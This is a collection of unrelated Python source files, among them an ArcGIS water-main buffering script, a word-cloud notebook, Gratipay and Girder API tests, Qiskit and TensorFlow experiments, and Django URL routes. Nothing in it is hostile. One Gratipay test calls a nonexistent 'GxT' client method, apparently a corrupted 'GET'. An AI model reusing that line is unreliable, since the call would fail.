'Barbara Gates <bgates@nnva.gov>']
################################################################################
def RecreateDistributionAreaPolygon():
startTime = datetime.datetime.now()
errorMsgs = []
try:
CreateTemporaryDatabase()
CreateFeatureClass()
CopyToProductionDatabase()
DeleteTemporaryDatabase()
except BaseException, e:
errorMsgs.append(e)
finally:
SendStatusMail(mailServer = MailServer,
sender = MailSender,
recipientsIfSuccess = MailRecipientsIfSuccess,
recipientsIfError = MailRecipientsIfError,
startDateTime = startTime,
errorMessages = errorMsgs)
################################################################################
def CreateTemporaryDatabase():
print 'CREATING TEMPORARY DATABASE ...'
if not gp.Exists(GDB):
print 'Creating directory ' + GDB + ' ...'
CreateDirectory(GDB)
if gp.Exists(GDB_Database):
print 'Deleting old temporary database ' + GDB_Database + ' ...'
gp.Delete(GDB_Database)
print 'Creating temporary database ' + GDB_Database + ' ...'
gp.CreateFileGDB(GDB, GDB_DatabaseName)
print 'Copying distribution mains from ' + SDE_wPressurizedMain + ' to temporary database ' + GDB_DistributionMain + ' ...'
whereClause = 'Subsystem = 50' # Distribution
gp.Select_analysis(SDE_wPressurizedMain, GDB_DistributionMain, whereClause)
def CreateFeatureClass():
print 'CREATING DISTRIBUTION AREA FEATURE CLASS ...'
print 'Buffering mains to create polygon feature class ' + GDB_DistributionArea + ' ...'
bufferZoneDistance = '500 FEET' # Create buffer zone of this distance around input features
lineSide = 'FULL' # Generate buffer on both sides of each line
lineEndType = 'ROUND' # Generate buffer in the shape of a half circle at the end of each line
dissolveOption = 'ALL' # Dissolve all buffers together into a single feature & remove overlap
dissolveField = '' # Ignore field values when dissolving buffers
gp.Buffer_analysis(GDB_DistributionMain, GDB_DistributionArea, bufferZoneDistance, lineSide, lineEndType, dissolveOption, dissolveField)
print 'Adding field FeatureCreationDate to ' + GDB_DistributionArea + ' ...'
gp.AddField(GDB_DistributionArea, 'FeatureCreationDate', 'DATE')
print 'Updating field: Setting FeatureCreationDate = today''s date ...'
gp.CalculateField(GDB_DistributionArea, 'FeatureCreationDate', 'Date()', 'VB')
def CopyToProductionDatabase():
# This procedure repopulates the DistributionArea feature class in the production database.
# (It does not replace the entire feature class. Deleting the old feature class requires an
# exclusive schama lock, which may not be available if services are running or basemap network is open.)
print 'COPYING DISTRIBUTION AREA FEATURES TO PRODUCTION DATABASE ...'
print 'Deleting old features from ' + SDE_DistributionArea + ' ...'
gp.deletefeatures(SDE_DistributionArea)
print 'Copying new features from ' + GDB_DistributionArea + ' to ' + SDE_DistributionArea + ' ...'
gp.Append_management(GDB_DistributionArea, SDE_DistributionArea)
def DeleteTemporaryDatabase():
print 'DELETING TEMPORARY DATABASE ...'
print 'Deleting temporary database ' + GDB_Database + ' ...'
gp.Delete(GDB_Database)
################################################################################
def CreateDirectory(fullPath):
'''Create directory if it does not exist'''
# Split fullPath into two parts: the drive or UNC prefix, and the remainder
(prefix, remainder) = os.path.splitdrive(fullPath)
if prefix == '':
(prefix, remainder) = os.path.splitunc(fullPath)
if remainder[0] == '\\':
remainder = remainder[1:]
# Split remainder into folder names
folders = remainder.split('\\')
# Create each subdirectory in fullPath that does not already exist
path = prefix
for folder in folders:
pathAndFolder = path + '\\' + folder
if not gp.Exists(pathAndFolder):
print ' Creating directory ' + pathAndFolder + ' ...'
gp.CreateFolder(path, folder)
path = pathAndFolder
################################################################################
def SendStatusMail(mailServer=MailServer,
sender=MailSender,
recipientsIfSuccess=[],
recipientsIfError=[],
startDateTime=datetime.datetime.now(),
errorMessages=[],
warningMessages=[],
informationalMessages=[],
logFiles=[]):
print 'Sending status email ...'
endDateTime = datetime.datetime.now()
elapsedTime = endDateTime - startDateTime
server = os.environ['COMPUTERNAME'].lower()
program = os.path.basename(sys.argv[0])
args = ' '.join(sys.argv[1:])
task = '%s %s' % (program, args)
if errorMessages:
status = 'Error'
recipients = recipientsIfError
elif logFiles:
status = 'Termination status unknown'
recipients = Union(recipientsIfSuccess, recipientsIfError)
else:
status = 'Success'
recipients = recipientsIfSuccess
subject = 'Scheduled Task - %s - %s' % (task, status)
body = 'Task: %s\r\n\r\n' % task
body += 'Server: %s\r\n\r\n' % server
body += 'Started: %s\r\n\r\n' % startDateTime.strftime('%A, %B %d, %Y %I:%M:%S %p')
body += 'Terminated: %s\r\n\r\n' % endDateTime.strftime('%A, %B %d, %Y %I:%M:%S %p')
body += 'Elapsed Time: %s\r\n\r\n' % str(elapsedTime).split('.')[0]
body += 'Status: %s\r\n\r\n' % status
if errorMessages:
body = body + '-------- %s --------\r\n\r\n' % 'Error Messages'
for m in errorMessages:
body += '%s\r\n' % str(m)
body += '\r\n'
if warningMessages:
body = body + '-------- %s --------\r\n\r\n' % 'Warning Messages'
for m in warningMessages:
body += '%s\r\n' % str(m)
body += '\r\n'
if informationalMessages:
body = body + '-------- %s --------\r\n\r\n' % 'Informational Messages'
for m in informationalMessages:
body += '%s\r\n' % str(m)
body += '\r\n'
for logFile in logFiles:
(logPath, logFileName) = os.path.split(logFile)
body += '-------- %s --------\r\n\r\n' % logFileName
f = open(logFile, 'r')
body += ''.join(f.readlines())
f.close()
body += '\r\n'
body += '\r\n'
body += 'This is an automatically generated message. Please do not reply.\r\n'
SendMail(mailServer, sender, recipients, subject, body)
def SendMail(mailServer=MailServer,
sender=MailSender,
recipients=[],
subject='',
body=''):
if recipients:
message = 'From: %s\r\n' % sender
message += 'To: %s\r\n' % ', '.join(recipients)
message += 'Subject: %s\r\n\r\n' % subject
message += '%s\r\n' % body
server = smtplib.SMTP(mailServer)
server.sendmail(sender, recipients, message)
server.quit()
def Union(list1, list2):
set1 = set(list1)
set2 = set(list2)
setUnion = set1.union(set2)
union = list(setUnion)
return union
################################################################################
RecreateDistributionAreaPolygon()
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.11.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from wordcloud import WordCloud
from konlpy.tag import Okt
from PIL import Image
import numpy as np
from wordcloud import ImageColorGenerator
# -
data1708 = pd.read_csv('2017.08_low_info.csv')
data1802 = pd.read_csv('2018.02_low_info.csv')
data1912 = pd.read_csv('2019.12_low_info.csv')
data2001 = pd.read_csv('2020.01_low_info.csv')
text1 = ''.join(v for v in data1708['title'])
text2 = ''.join(v for v in data1802['title'])
text3 = ''.join(v for v in data1912['title'])
text4 = ''.join(v for v in data2001['title'])
# +
text1 = text1.replace('부동산', '')
text1 = text1.replace('.','')
text2 = text2.replace('부동산', '')
text2 = text2.replace('.','')
text3 = text3.replace('부동산', '')
text3 = text3.replace('.','')
text4 = text4.replace('부동산', '')
text4 = text4.replace('.','')
# -
image_example = np.array(Image.open('seoul.jpg'))
mask = np.array(image_example)
image_colors = ImageColorGenerator(image_example)
wordcloud = WordCloud(font_path = 'NanumSquareR.ttf',
max_font_size = 100,
random_state = 42,
mask = mask,
max_words=150,
background_color = 'white',
width=mask.shape[1],
height=mask.shape[0]).generate(text1)
plt.figure(figsize=(12,15))
plt.axis('off')
plt.imshow(wordcloud, interpolation='bilinear')
plt.show()
# +
wordcloud = WordCloud(font_path = 'NanumSquareR.ttf',
max_font_size = 100,
random_state = 42,
mask = mask,
max_words=150,
background_color = 'white',
width=mask.shape[1],
height=mask.shape[0]).generate(text2)
plt.figure(figsize=(12,15))
plt.axis('off')
plt.imshow(wordcloud, interpolation='bilinear')
plt.show()
# +
wordcloud = WordCloud(font_path = 'NanumSquareR.ttf',
max_font_size = 100,
random_state = 42,
mask = mask,
max_words=150,
background_color = 'white',
width=mask.shape[1],
height=mask.shape[0]).generate(text3)
plt.figure(figsize=(12,15))
plt.axis('off')
plt.imshow(wordcloud, interpolation='bilinear')
plt.show()
# +
wordcloud = WordCloud(font_path = 'NanumSquareR.ttf',
max_font_size = 100,
random_state = 42,
mask = mask,
max_words=150,
background_color = 'white',
width=mask.shape[1],
height=mask.shape[0]).generate(text4)
plt.figure(figsize=(12,15))
plt.axis('off')
plt.imshow(wordcloud, interpolation='bilinear')
plt.show()
# -
|
__author__ = 'Jeevan'
"""
Mapper program takes input files from the hadoop job, i.e data from pos and neg
folders from both training and testing.
"""
import sys
import glob
from nltk.corpus import stopwords # Import the stop word list
import re
from bs4 import BeautifulSoup # Imported to remove html tags from the review data
def main():
from nltk.stem import SnowballStemmer # Imported to perform stemming on the data
stemmer = SnowballStemmer('english')
stop_words = stopwords.words("english")
for line in sys.stdin:
line = line.strip()
id,label,review = line.split('||') # Separates each line into id,label,review
html_strip = BeautifulSoup(review,'html.parser')
words = re.sub("[^a-zA-Z]"," ",html_strip.get_text() )
words = words.split()
words = [w.lower() for w in words if w.lower() not in stop_words] #collecting words which are not stop words
words = [stemmer.stem(word) for word in words]
print '%s\t%s\t%s' % (label,id,' '.join(words)) # Mapper output with Label as key and the rest are values
if __name__ =="__main__":
main()
|
from collections import Counter
class ValueHistogram:
def build(self, values):
c = Counter(values)
h = max(c.values()) + 1
return [
''.join(e)
for e in zip(*[(c[i]*'X') + (h-c[i])*'.' for i in xrange(10)])
][::-1]
|
#%%
from cv2 import cv2
import numpy as np
import matplotlib.pyplot as plt
import json
import os
def proccess_image(img):
width = 1200
height = 600
img = cv2.resize(img, (width, height))
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = cv2.GaussianBlur(img, (3, 3), 3)
return img
orb = cv2.ORB_create(nfeatures=1000)
bf = cv2.BFMatcher()
class Sample:
def __init__(self, descriptor, icon_area, class_name):
self.descriptor = descriptor
self.icon_area = icon_area
self.bank_name = class_name
def crop_by_icon_area(self, img):
area = self.icon_area
return img[area[0]:area[1], area[2]:area[3]]
def match(self, img):
img = proccess_image(img)
img = self.crop_by_icon_area(img)
_, other_des = orb.detectAndCompute(img, None)
if other_des is None:
return -1
matches = bf.knnMatch(self.descriptor, other_des, k=2)
if matches and len(matches[0]) != 2:
return -2
score = 0
for m, n in matches:
if m.distance < 0.75 * n.distance:
score += 1
return score
def show_icon_area(self, img):
plt.imshow(self.crop_by_icon_area(img))
plt.show()
# To add descriptors for new cheque:
# 1. In directory 'icons/' put cropped sample of new icon image
# name it as follows: listOfCordinaties-bankName.jpg
# listOfCordinaties - area position and size where to look for this icon in cheque
# Example: [100, 120, 10, 50]-discount.jpg
# 2. Run this file(will create descriptors and save them in '/icons')
# 3. Move early created descriptors(.json) to '/Descriptors' directory
# 4. Create file in '/Parser' where create Class as in template /Parser/mizrahi_parser.py(Inherit from BaseCheque)
# 5. Import just created file in 'Parser/__init__.py' as all other imported.
samples = []
for name in os.listdir('icons/'):
if '.jpg' in name:
icon_area = json.loads(name.split('-')[0])
bank_name = name.split('-')[1].split('.')[0]
img = cv2.imread('icons/' + name, 0)
kp, des = orb.detectAndCompute(img, None)
sample = Sample(des, icon_area, bank_name)
samples.append(sample)
for i, sample in enumerate(samples):
file_name = f'{sample.bank_name}-{i}.json'
data = {
'bank_name': sample.bank_name,
'descriptor': sample.descriptor.tolist(),
'icon_area': sample.icon_area,
}
data = json.dumps(data)
with open('icons/' + file_name, 'w') as f:
f.write(data)
|
from __future__ import print_function, unicode_literals
import json
from aspen.utils import utcnow
from gratipay.testing import Harness
class Tests(Harness):
def make_participant(self, *a, **kw):
kw['claimed_time'] = utcnow()
return Harness.make_participant(self, *a, **kw)
def test_on_key_gives_gratipay(self):
self.make_participant('alice', last_bill_result='')
data = json.loads(self.client.GET('/alice/public.json').body)
assert data['on'] == 'gratipay'
def test_anonymous_gets_receiving(self):
alice = self.make_participant('alice', last_bill_result='')
bob = self.make_participant('bob')
alice.set_tip_to(bob, '1.00')
data = json.loads(self.client.GET('/bob/public.json').body)
assert data['receiving'] == '1.00'
def test_anonymous_does_not_get_my_tip(self):
alice = self.make_participant('alice', last_bill_result='')
bob = self.make_participant('bob')
alice.set_tip_to(bob, '1.00')
data = json.loads(self.client.GET('/bob/public.json').body)
assert data.has_key('my_tip') == False
def test_anonymous_gets_giving(self):
alice = self.make_participant('alice', last_bill_result='')
bob = self.make_participant('bob')
alice.set_tip_to(bob, '1.00')
data = json.loads(self.client.GET('/alice/public.json').body)
assert data['giving'] == '1.00'
def test_anonymous_gets_null_giving_if_user_anonymous(self):
alice = self.make_participant( 'alice'
, last_bill_result=''
, anonymous_giving=True
)
bob = self.make_participant('bob')
alice.set_tip_to(bob, '1.00')
data = json.loads(self.client.GET('/alice/public.json').body)
assert data['giving'] == None
def test_anonymous_gets_null_receiving_if_user_anonymous(self):
alice = self.make_participant( 'alice'
, last_bill_result=''
, anonymous_receiving=True
)
bob = self.make_participant('bob')
alice.set_tip_to(bob, '1.00')
data = json.loads(self.client.GET('/alice/public.json').body)
assert data['receiving'] == None
def test_anonymous_does_not_get_goal_if_user_regifts(self):
self.make_participant('alice', last_bill_result='', goal=0)
data = json.loads(self.client.GET('/alice/public.json').body)
assert data.has_key('goal') == False
def test_anonymous_gets_null_goal_if_user_has_no_goal(self):
self.make_participant('alice', last_bill_result='')
data = json.loads(self.client.GET('/alice/public.json').body)
assert data['goal'] == None
def test_anonymous_gets_user_goal_if_set(self):
self.make_participant('alice', last_bill_result='', goal=1)
data = json.loads(self.client.GET('/alice/public.json').body)
assert data['goal'] == '1.00'
def test_authenticated_user_gets_their_tip(self):
alice = self.make_participant('alice', last_bill_result='')
bob = self.make_participant('bob')
alice.set_tip_to(bob, '1.00')
raw = self.client.GET('/bob/public.json', auth_as='alice').body
data = json.loads(raw)
assert data['receiving'] == '1.00'
assert data['my_tip'] == '1.00'
def test_authenticated_user_doesnt_get_other_peoples_tips(self):
alice = self.make_participant('alice', last_bill_result='')
bob = self.make_participant('bob', last_bill_result='')
carl = self.make_participant('carl', last_bill_result='')
dana = self.make_participant('dana')
alice.set_tip_to(dana, '1.00')
bob.set_tip_to(dana, '3.00')
carl.set_tip_to(dana, '12.00')
raw = self.client.GET('/dana/public.json', auth_as='alice').body
data = json.loads(raw)
assert data['receiving'] == '16.00'
assert data['my_tip'] == '1.00'
def test_authenticated_user_gets_zero_if_they_dont_tip(self):
self.make_participant('alice', last_bill_result='')
bob = self.make_participant('bob', last_bill_result='')
carl = self.make_participant('carl')
bob.set_tip_to(carl, '3.00')
raw = self.client.GET('/carl/public.json', auth_as='alice').body
data = json.loads(raw)
assert data['receiving'] == '3.00'
assert data['my_tip'] == '0.00'
def test_authenticated_user_gets_self_for_self(self):
alice = self.make_participant('alice', last_bill_result='')
bob = self.make_participant('bob')
alice.set_tip_to(bob, '3.00')
raw = self.client.GET('/bob/public.json', auth_as='bob').body
data = json.loads(raw)
assert data['receiving'] == '3.00'
assert data['my_tip'] == 'self'
def test_access_control_allow_origin_header_is_asterisk(self):
self.make_participant('alice', last_bill_result='')
response = self.client.GET('/alice/public.json')
assert response.headers['Access-Control-Allow-Origin'] == '*'
def test_jsonp_works(self):
alice = self.make_participant('alice', last_bill_result='')
bob = self.make_participant('bob')
alice.set_tip_to(bob, '3.00')
raw = self.client.GxT('/bob/public.json?callback=foo', auth_as='bob').body
assert raw == '''\
foo({
"avatar": null,
"elsewhere": {
"github": {
"id": %(elsewhere_id)s,
"user_id": "%(user_id)s",
"user_name": "bob"
}
},
"giving": "0.00",
"goal": null,
"id": %(user_id)s,
"my_tip": "self",
"npatrons": 1,
"number": "singular",
"on": "gratipay",
"receiving": "3.00",
"username": "bob"
})''' % dict(user_id=bob.id, elsewhere_id=bob.get_accounts_elsewhere()['github'].id)
|
import numpy
import theano.tensor as T
from theano import function
x = T.dscalar('x')
y = T.dscalar('y')
|
import json
import pytest
from girder.models.item import Item
from pytest_girder.assertions import assertStatusOk
from geometa.constants import GEOMETA_FIELD
from ..utils import uploadSampleData
@pytest.mark.plugin('geometa')
def test_geometa_create_endpoint(server, admin, fsAssetstore):
uploaded = uploadSampleData(server, admin, 'tests/data/*.tif')[0]
document = Item().load(uploaded['itemId'], user=admin)
# Remove geometa from item and recreate it using the endpoint
# as opposed to relying on upload event
del document[GEOMETA_FIELD]
Item().updateItem(document)
resp = server.request(path='/item/{}/geometa'.format(uploaded['itemId']),
method='PUT',
user=admin)
assertStatusOk(resp)
document = Item().load(uploaded['itemId'], user=admin)
assert GEOMETA_FIELD in document
@pytest.mark.plugin('geometa')
@pytest.mark.parametrize('geometa', [
(
{
'crs': '',
'type_': 'raster',
'bounds': {
"type": "Polygon",
"coordinates": [
[
[
-97.73400217294692,
40.17914177196121
],
[
-97.73371249437332,
40.17914177196121
],
[
-97.73371249437332,
40.17936924284886
],
[
-97.73400217294692,
40.17936924284886
],
[
-97.73400217294692,
40.17914177196121
]
]
]
},
'nativeBounds': {'left': 1,
'right': 1,
'top': 2,
'bottom': 2}
}
)
])
def test_geometa_create_with_user_data(server, admin, fsAssetstore, geometa):
uploaded = uploadSampleData(server, admin, 'tests/data/*.tif')[0]
server.request(path='/item/{}/geometa'.format(uploaded['itemId']),
params={'geometa': json.dumps(geometa)},
method='PUT',
user=admin)
document = Item().load(uploaded['itemId'], user=admin)
assert document[GEOMETA_FIELD] == geometa
@pytest.mark.plugin('geometa')
@pytest.mark.parametrize('geometa', [
({'foo': 'bar'})
])
def test_bad_geometa_fails(server, admin, fsAssetstore, geometa):
uploaded = uploadSampleData(server, admin, 'tests/data/*.tif')[0]
resp = server.request(path='/item/{}/geometa'.format(uploaded['itemId']),
params={'geometa': json.dumps(geometa)},
method='PUT',
user=admin)
assert resp.status == '400 Bad Request'
@pytest.mark.plugin('geometa')
@pytest.mark.parametrize('geometa', [
(
{
'crs': '',
'type_': 'raster',
'bounds': {
"type": "Polygon",
"coordinates": [
[
[
-97.73400217294692,
40.17914177196121
],
[
-97.73371249437332,
40.17914177196121
],
[
-97.73371249437332,
40.17936924284886
],
[
-97.73400217294692,
40.17936924284886
],
[
-97.73400217294692,
40.17914177196121
]
]
]
},
'nativeBounds': {'left': 1,
'right': 1,
'top': 2,
'bottom': 2},
'foobar': 'barfoo'
}
)
])
def test_geometa_custom_data_is_returned(server, admin, fsAssetstore, geometa):
uploaded = uploadSampleData(server, admin, 'tests/data/*.tif')[0]
server.request(path='/item/{}/geometa'.format(uploaded['itemId']),
params={'geometa': json.dumps(geometa)},
method='PUT',
user=admin)
response = server.request(
path='/item/{}/geometa'.format(uploaded['itemId']),
user=admin)
assert 'foobar' in response.json.keys()
|
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from typing import List, Optional, Union
from airbyte_cdk.models import FailureType
from airbyte_cdk.utils.traced_exception import AirbyteTracedException
from .source_files_abstract.file_info import FileInfo
class S3Exception(AirbyteTracedException):
def __init__(
self,
file_info: Union[List[FileInfo], FileInfo],
internal_message: Optional[str] = None,
message: Optional[str] = None,
failure_type: FailureType = FailureType.system_error,
exception: BaseException = None,
):
file_info = (
file_info
if isinstance(file_info, (list, tuple))
else [
file_info,
]
)
file_names = ", ".join([file.key for file in file_info])
user_friendly_message = f"""
The connector encountered an error while processing the file(s): {file_names}.
{message}
This can be an input configuration error as well, please double check your connection settings.
"""
super().__init__(internal_message=internal_message, message=user_friendly_message, failure_type=failure_type, exception=exception)
|
from qiskit import IBMQ, Aer
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit.qasm import pi
from qiskit.extensions import U3Gate
import numpy as np
import matplotlib.pyplot as plt
import os
from rwutil import *
OUTPUT = "output"
IBMQ.load_account()
Prov = IBMQ.get_provider(group='open')
BACKENDS = {
'qasm_simulator': (Aer.get_backend('qasm_simulator'), True),
'ibmq_qasm_simulator': (Prov.get_backend('ibmq_qasm_simulator'), False),
'ibmq_london': (Prov.get_backend('ibmq_qasm_simulator'), False),
'ibmq_vigo': (Prov.get_backend('ibmq_qasm_simulator'), False)
}
SHOTS = 1000
T = np.linspace(0, 6.5, num=50)
def circuit(t):
q = QuantumRegister(1, name="q")
c = ClassicalRegister(1, name="c")
circuit = QuantumCircuit(q, c)
circuit.append(U3Gate(2 * t, -pi/2, pi/2), [0])
circuit.measure(q, c)
return circuit
circuits = [circuit(t) for t in T]
if not os.path.exists(OUTPUT):
os.mkdir(OUTPUT)
for (name, (backend, enabled)) in BACKENDS.items():
if enabled:
results = run_circuits(circuits, backend, SHOTS, 1)
plot_circuits(T, results)
plt.savefig(f"{OUTPUT}/continuous_1_{name}.png")
plot_position_over_time(T, results)
plt.savefig(f"{OUTPUT}/continuous_1_{name}_pos.png")
plt.show()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 25 14:55:27 2017
@author: misakawa
"""
class Typedef:
def __init__(self, type_, error_msg = "Type of {return_or_input} {idx_or_key} should be {type}." ):
self.type_ = type_
self.error_msg = error_msg
def set_lambda(self, dual_callable_obj):
self.check = lambda input_var: dual_callable_obj(input_var, self.type_)
return self
NEq = lambda type_: Typedef(type_, error_msg="Type of {return_or_input} {idx_or_key} shouldn't be {type}.").set_lambda(
lambda input_var, input_type : not isinstance(input_var, input_type) )
Or = lambda *type_:Typedef(type_, error_msg="Type of {return_or_input} {idx_or_key} should be in {type}").set_lambda(
lambda input_var, input_type: input_var.__class__ in input_type )
def error_helper(template_msg, **kwargs):
template = template_msg+'\n'+"The type of current input {return_or_input} is {input_var_type}."
return template.format(**kwargs)
def _check(input_var, check_type, idx = None, key = None, ret = None):
return_or_input = lambda :"return" if ret else "argument"
error_render = lambda :dict(idx_or_key = key if key else idx,
return_or_input = return_or_input(),
type = _type,
input_var_type = input_var.__class__)
if isinstance(check_type, Typedef):
_type = check_type.type_
if not check_type.check(input_var):
raise TypeError(error_helper(check_type.error_msg, **error_render()))
else:
_type = check_type
if not isinstance(input_var, check_type):
raise TypeError(error_helper("Type of {return_or_input} {idx_or_key} should be {type}.", **error_render()))
class strict:
def __new__(self):
return strict
def args(*typeargs : "*[, typearg]" , **typekwargs : "**dict(, kw = arg)"):
def _1(func):
def _2(*args, **kwargs):
for arg_idx, (arg,typearg) in enumerate(zip(args, typeargs)):
try:
_check(arg, typearg, idx=arg_idx)
except TypeError as e:
raise TypeError(e)
for key in kwargs:
try:
_check(kwargs[key], typekwargs[key], key=key)
except TypeError as e:
raise TypeError(e)
return func(*args,**kwargs)
return _2
return _1
def ret(*typerets : "*[, typearg]"):
def _1(func):
def _2(*args, **kwargs):
ret = func(*args, **kwargs)
if len(typerets) > 1:
for ret_idx,(ret_i, typeret) in enumerate(zip(ret, typerets)):
try:
_check(ret_i, typeret, idx=ret_idx)
except TypeError as e:
raise TypeError(e)
else:
try:
_check(ret, typerets[0], idx=0)
except TypeError as e:
raise TypeError(e)
return ret
return _2
return _1
|
# Multi-variable linear regression2
import tensorflow as tf
tf.set_random_seed(777)
# 데이터
# x1 x2 x3
x_data = [[73., 80., 75.], # (5,3)
[93., 88., 93.],
[89., 91., 90.],
[96., 98., 100.],
[73., 66., 70.]]
y_data = [[152.], # 5,1
[185.],
[180.],
[196.],
[142.]]
# 텐서 모델
# placehodlers for a tensor that will be always fed
x = tf.placeholder(tf.float32, shape=[None, 3]) # input_dim = 3 x의 calumn의 개수
y = tf.placeholder(tf.float32, shape=[None, 1]) # output = 1 y의 calumn의 개수
# shape=[None, 1]에서의 None -> 행 무시
w = tf.Variable(tf.random_normal([3, 1]), name='weight') # tf.random_normal([3,1]) => input_dim=3, output = 1
b= tf.Variable(tf.random_normal([1]), name='bias') # tf.random_normal([1]) => output=1
hypothesis = tf.matmul(x,w) + b # tf.matmul() -> 행렬의 곱 (x1*w1 + x2*w2 + x3*w3)
'''
x1 x2 x3 * w = tf.matmul()
[[73., 80., 75.], [[w1], [[73*w1 + 80*w2 + 75*w3],
[93., 88., 93.], [93*w1 + 88*w2 + 93*w3],
[89., 91., 90.], * [w2], = [89*w1 + 91*w2 + 90*w3],
[96., 98., 100.], [96*w1 + 98*w2 + 100*w3],
[73., 66., 70.]] [w3]] [73*w1 + 66*w2 + 70*w3]]
'''
cost = tf.reduce_mean(tf.square(hypothesis - y))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=1e-5)
train = optimizer.minimize(cost)
# Launch the graph in a session
sess = tf.Session()
# Initializes global variables in the graph
sess.run(tf.global_variables_initializer())
for step in range(2001):
cost_val ,hy_val, _ = sess.run(
[cost, hypothesis, train],
feed_dict={x:x_data, y:y_data}
)
if step % 10 == 0:
print(step, 'Cost:', cost_val, '\nPrediction\n', hy_val) # hy_val은 예측값(y_predict)을 출력 -> y값과 비슷해야 한다.
'''
2000 Cost: 3.178887
Prediction
[[154.3593 ]
[182.95117]
[181.85052]
[194.3554 ]
[142.03566]]
''' |
import tensorflow as tf
import skimage.color, skimage.transform
# Hyper-parameters
# Experiment name
exp_name = 'DDQN-SpaceInvaders'
# Environment
env_name = 'SpaceInvaders-v0'
# Whether to train
train = True
# Whether to plot
plot = True
# Whether to get stats
stats = False
# Whether to render
render = False
# Whether to save videos while getting stats
capture_videos = False
# Feature extractor ('linear', 'fc', 'conv')
extractor_type = 'conv'
# Whether to use the experience replay
use_replay = True
# Standard DQN or dueling
dueling = False
# Standard or DDQN
double = True
# Weights initializer
kernel_initializer = tf.contrib.layers.xavier_initializer()
bias_initializer = tf.constant_initializer(0.0)
# Model directory
model_path = 'tmp/'
# Maximum iterations for training
max_iterations = 2000000
# Gamma
discount_factor = 0.99
# Learning rate
lr = 0.0001
# Epsilon greedy exploration
initial_exploration = 1.
final_exploration = 0.1
final_exploration_frame = max_iterations / 2
exploration_change_rate = (final_exploration - initial_exploration) * (1. / final_exploration_frame)
test_exploration = 0.1
# Batch size
batch_size = 32
# Experience replay memory size
replay_memory_size = 250000
# Number of burn in actions
burn_in = 10000
# Helper functions
# Tensorflow FC layer
def fc_layer(name, input, input_size, num_units, activation=tf.nn.relu):
with tf.variable_scope(name):
weights = tf.get_variable('weights', shape=[input_size, num_units], initializer=kernel_initializer)
bias = tf.get_variable('bias', shape=[num_units], initializer=bias_initializer)
if activation is not None:
return activation(tf.matmul(input, weights) + bias)
else:
return tf.matmul(input, weights) + bias
# Tensorflow conv layer for space invaders
def conv_layer(name, input, shape, stride, activation=tf.nn.relu):
with tf.variable_scope(name):
conv_weights = tf.get_variable('kernel', shape=shape, initializer=kernel_initializer)
conv_bias = tf.get_variable('bias', shape=[shape[3]], initializer=bias_initializer)
return activation(tf.nn.conv2d(input, conv_weights, strides=(1, stride, stride, 1), padding='VALID') + conv_bias)
# Feature extractors
# 'fc' for DQNs
def fc_extractor(input, input_size):
hidden1 = fc_layer('hidden1', input, input_size=input_size, num_units=30)
hidden2 = fc_layer('hidden2', hidden1, input_size=30, num_units=30)
hidden3 = fc_layer('hidden3', hidden2, input_size=30, num_units=30)
return hidden3
# 'conv' for Space Invaders
def conv_extractor(input):
normalize = (input - (255.0 / 2)) / (255.0 / 2)
conv1 = conv_layer('conv1', normalize, shape=[8, 8, 4, 32], stride=4)
conv2 = conv_layer('conv2', conv1, shape=[4, 4, 32, 64], stride=2)
conv3 = conv_layer('conv3', conv2, shape=[3, 3, 64, 64], stride=1)
flatten = tf.reshape(conv3, (-1, 7 * 7 * 64))
fc = fc_layer('fc', flatten, input_size=7 * 7 * 64, num_units=512)
return fc
# Choice of extractor
def extractor(input, input_size, type):
if type == 'linear':
return input, input_size
elif type == 'fc':
return fc_extractor(input, input_size), 30
else:
return conv_extractor(input), 512
# Q estimation from features
def estimate_Q(input, input_size, num_actions, dueling=False):
if dueling:
value = fc_layer('value', input, input_size=input_size, num_units=1, activation=None)
advantage = fc_layer('advantage', input, input_size=input_size, num_units=num_actions, activation=None)
Q = (advantage - tf.reshape(tf.reduce_mean(advantage, axis=1), (-1, 1))) + tf.reshape(value, (-1, 1))
else:
Q = fc_layer('Q', input, input_size=input_size, num_units=num_actions, activation=None)
return Q
# Process space invaders frames
def preprocess(frame):
return skimage.color.rgb2gray(skimage.transform.resize(frame, (84, 84))) |
import numpy as np
def o2satv2a(salinity: np.ndarray, temp: np.ndarray) -> np.ndarray:
"""
Calculate O2 concentration at saturation
:param salinity:
:param temp:
:return:
"""
# Define constants, etc. for saturation calculation
# The constants used are for units of mL O2 / L.
a0 = 2.00856
a1 = 3.22400
a2 = 3.99063
a3 = 4.80299
a4 = 9.78188e-01
a5 = 1.71069
b0 = -6.24097e-03
b1 = -6.93498e-03
b2 = -6.90358e-03
b3 = -4.29155e-03
c0 = -3.11680e-07
# Calculate Ts from T (deg C)
ts = np.log((298.15 - temp) / (273.15 + temp))
# Calculate O2 saturation in mL O2/L.
a = ((((a5 * ts + a4) * ts + a3) * ts + a2) * ts + a1) * ts + a0
b = ((b3 * ts + b2) * ts + b1) * ts + b0
return np.exp(a + salinity * (b + salinity * c0))
|
from django.urls import path, include
from django.conf.urls import url
from .views import *
from rest_framework import routers
from .views1 import AssetsView, RecipesView, PicturesView
from rest_framework_swagger.views import get_swagger_view
schema_view = get_swagger_view(title='Recipes API')
router = routers.DefaultRouter()
router.register('assets', AssetsView)
router.register('branchrecipes', BranchRecipesView)
router.register('classificationtext', ClassificationsTextView)
router.register('ingredientset', IngredientSetView)
router.register('ingredientsetingredient', IngredientSetIngredientView)
router.register('ingredientsetnutrition', IngredientSetNutritionView)
router.register('ingredientsource', IngredientSourceView)
router.register('ingredienttype', IngredientTypeView)
router.register('keywordmaster', KeywordMasterView)
router.register('kraftrecipes', KraftRecipesView)
router.register('languages', LanguagesView)
router.register('recipeingredientsattribute', RecipeIngredientAttributeView)
router.register('recipeingredientlinkattribute', RecipeIngredientLinkAttributeView)
router.register('recipeingredients', RecipeIngredientsView)
router.register('recipekeywords', RecipeKeywordsView)
router.register('recipenutrio', RecipeNutrioView)
router.register('recipenutritionexchangeheading', RecipeNutritionExchangeHeadingView)
router.register('recipephotos', RecipePhotosView)
